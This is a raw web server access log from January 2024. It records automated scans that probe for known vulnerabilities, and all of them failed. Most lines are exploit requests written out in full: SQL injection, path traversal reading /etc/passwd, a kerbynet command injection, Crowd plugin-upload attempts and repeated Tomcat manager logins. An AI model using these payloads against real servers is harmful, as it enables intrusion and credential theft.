137.220.197.141 - - [21/Jan/2024:10:04:41 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:04:42 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:02 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:03 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:03 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:03 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:05 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:18 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:45 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:54 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:05:56 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:06:36 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:06:38 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:07:32 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:07:42 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:07:55 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:08:59 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:09:04 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:09:09 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:09:21 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:09:47 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:09:49 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:10:09 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:10:11 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:10:34 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:10:36 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:10:58 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:11:00 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:11:06 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:11:16 +0100] "POST /checkValid HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:11:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:11:30 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:11:30 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:11:31 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:11:37 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:11:43 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:11:49 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:11:54 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:00 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:07 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:12 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:17 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:12:20 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:12:23 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:12:32 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:12:34 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:12:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:41 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:12:53 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:00 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:05 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:13:06 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:13:11 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:13:14 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:13:17 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:13:17 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:13:19 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:13:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:13:26 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:13:29 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:13:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:13:39 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:13:42 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:48 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:54 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:13:59 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:04 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:10 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:16 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:22 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:27 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:14:32 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:14:32 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:40 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:45 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:14:47 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:14:49 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:14:49 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:14:56 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:01 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:06 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:22 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:31 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:42 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:15:56 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:02 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:08 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:16:11 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:16:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:19 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:16:23 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:16:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:30 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:16:37 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:16:41 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:16:52 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:16:53 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:16:57 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:02 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:08 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:17:13 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:17:15 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:17:18 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:17:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:17:22 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:17:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:41 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:53 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:17:59 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:04 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:09 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:15 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:18:17 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:18:17 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:18:22 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:27 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:18:28 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:18:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:39 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:18:40 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:18:44 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:18:45 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:18:50 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:18:55 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:18:58 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:19:00 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:19:01 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:08 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:19:21 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:19:23 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:19:26 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:19:28 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:19:28 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:19:34 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:19:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:40 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:45 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:19:48 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:19:50 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:19:50 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:19:56 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:19:56 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:19:58 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:20:02 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:07 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:13 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:20:17 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:20:18 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:24 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:29 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:34 +0100] "GET /manager/html HTTP/1.1" 401 1833
146.19.24.23 - - [21/Jan/2024:10:20:39 +0100] "GET / HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:20:40 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:45 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:20:51 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:20:56 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:20:56 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:20:58 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:21:03 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:21:03 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:21:05 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:21:09 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:21:14 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:21:14 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:21:20 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:21:25 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:21:31 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:21:36 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:21:40 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:21:40 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:10:21:42 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:10:21:47 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:10:22:28 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:22:50 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:23:03 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:23:19 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:16 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:18 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:38 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:40 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:45 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:57 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:24:58 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:00 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:03 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:05 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:10 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:25 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:27 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:39 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:25:54 +0100] "GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:26:12 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:26:36 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:05 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:07 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:31 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:37 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:46 +0100] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:46 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:28:50 +0100] "GET /free_time.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:29:43 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:30:09 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:31:51 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:31:52 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:01 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:03 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:20 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:22 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:47 +0100] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:32:49 +0100] "GET /crowd/plugins/servlet/exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:33:09 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:33:11 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:33:32 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:33:34 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:34:20 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:34:22 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:34:32 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:35:00 +0100] "GET /login HTTP/1.1" 404 952
